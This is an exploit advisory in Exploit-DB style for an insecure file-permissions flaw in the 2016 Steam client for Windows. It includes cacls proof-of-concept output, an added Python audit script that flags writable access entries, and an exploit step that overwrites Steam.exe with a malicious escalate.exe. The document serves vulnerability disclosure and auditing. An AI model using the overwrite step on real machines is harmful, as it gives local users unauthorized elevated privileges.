# Exploit Title: Steam Insecure File Permissions Privilege Escalation
# Date: 24/09/2016
# Exploit Author: zaeek@protonmail.com
# Vendor Homepage: http://store.steampowered.com/
# Version: 3.61.93.65
# Tested on: Windows 7 32/64bit
====Description====
Steam Client for Windows lacks proper file permissions, creating a vector for a privilege escalation attack.
To exploit this vulnerability, a local attacker overwrites the vulnerable file(s) with malicious ones, which is possible because the attacker has full Read/Write rights to the given file.
====Proof-of-Concept====
C:\Program Files\Steam>cacls steam.exe
C:\Program Files\Steam\Steam.exe BUILTIN\Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
MASTER-PC\MASTER:(ID)F
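The same check as an audit step, as an added example that is not part of the original advisory: a parser for cacls output that flags entries giving broad groups W, C or F on a file. The list of broad principals and the HARDENED sample are assumptions made for this illustration.

```python
import re

# Broad groups that contain ordinary local users (assumed list; extend as needed).
BROAD_PRINCIPALS = (
    r"BUILTIN\Users", "Everyone",
    r"NT AUTHORITY\Authenticated Users", r"NT AUTHORITY\INTERACTIVE",
)
# cacls simple rights that allow replacing file contents: W(rite), C(hange), F(ull).
WRITABLE = {"W", "C", "F"}

# The first cacls line carries the path before the ACE, so match at end of line.
ACE_RE = re.compile(
    r"(?:^|\s)(?P<who>" + "|".join(re.escape(p) for p in BROAD_PRINCIPALS) + r")"
    r":(?P<flags>(?:\([A-Z]+\))*)(?P<right>[NRWCF])\s*$",
    re.IGNORECASE,
)

def weak_aces(cacls_output):
    """Return (principal, right, inherited) for ACEs that let broad groups modify the file."""
    findings = []
    for line in cacls_output.splitlines():
        m = ACE_RE.search(line)
        if not m:
            continue
        flags = re.findall(r"\(([A-Z]+)\)", m.group("flags").upper())
        if "IO" in flags:  # inherit-only: the ACE does not apply to this object
            continue
        right = m.group("right").upper()
        if right in WRITABLE:
            # (ID) means inherited: the ACL has to be corrected on the parent folder.
            findings.append((m.group("who"), right, "ID" in flags))
    return findings

# Output copied from the Proof-of-Concept section of this advisory.
POC = r"""C:\Program Files\Steam\Steam.exe BUILTIN\Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
MASTER-PC\MASTER:(ID)F"""

# Constructed sample: an executable that Users can only read.
HARDENED = r"""C:\Program Files\App\app.exe BUILTIN\Users:(ID)R
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F"""

if __name__ == "__main__":
    for who, right, inherited in weak_aces(POC):
        print(f"WEAK: {who} has {right} (inherited={inherited})")
```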
====Exploit====
c:\>whoami
test\testusr
c:\>net user testusr
User name testusr
Full Name testusr
(...)
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
c:\>copy C:\Users\testusr\Desktop\escalate.exe "C:\Program Files\Steam\Steam.exe" /y
1 file(s) copied.